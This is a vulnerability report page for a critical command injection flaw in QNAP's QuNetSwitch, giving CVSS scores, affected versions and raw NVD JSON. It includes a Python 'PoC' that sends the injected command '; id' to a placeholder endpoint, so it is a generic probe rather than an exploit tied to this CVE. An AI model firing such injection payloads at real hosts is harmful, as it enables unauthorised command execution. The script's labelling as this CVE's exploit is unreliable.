Security Vulnerability Report
CVE-2026-22897 CVSS 9.8 CRITICAL

Published: 2026-03-20 17:16:44
Last Modified: 2026-03-25 21:06:25

Description

A command injection vulnerability has been reported to affect QuNetSwitch. Remote attackers can exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following version: QuNetSwitch 2.0.4.0415 and later.

CVSS Details

CVSS v3.1 Score: 9.8
Severity: CRITICAL
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0 Score (secondary): 8.1 HIGH
Weakness: CWE-78 (OS Command Injection)

Configurations (Affected Products)

cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:* - VULNERABLE
QuNetSwitch >= 2.0.1.13077 and < 2.0.4.0415 (fixed in 2.0.4.0415 and later)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def verify_poc(target_url):
    """
    Proof of Concept for Command Injection in QuNetSwitch.
    This script attempts to execute the 'id' command.
    """
    # Replace with the actual vulnerable endpoint and parameter
    endpoint = "/api/vulnerable_endpoint"
    payload = "; id"
    full_url = f"{target_url}{endpoint}"
    try:
        # Sending malicious payload
        response = requests.get(full_url, params={"param": payload}, timeout=10)
        # Checking if command output exists in response
        if "uid=" in response.text or "gid=" in response.text:
            print(f"[+] Target {target_url} is vulnerable.")
            print(f"[+] Command execution output: {response.text}")
        else:
            print(f"[-] Target {target_url} does not appear to be vulnerable.")
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://192.168.1.100:8080"  # Example Target
    verify_poc(target)
```

References

https://www.qnap.com/en/security-advisory/qsa-26-11 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-22897", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.147", "lastModified": "2026-03-25T21:06:25.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to execute arbitrary commands.\n\nWe have already fixed the vulnerability in the following version:\nQuNetSwitch 2.0.4.0415 and later"}, {"lang": "es", "value": "Se ha informado de una vulnerabilidad de inyección de comandos que afecta a QuNetSwitch. Los atacantes remotos pueden entonces explotar la vulnerabilidad para ejecutar comandos arbitrarios.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuNetSwitch 2.0.4.0415 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.1.13077", "versionEndExcluding": "2.0.4.0415", "matchCriteriaId": "111CE6FD-D6FE-4B5F-AC00-C1C7D7DB3704"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```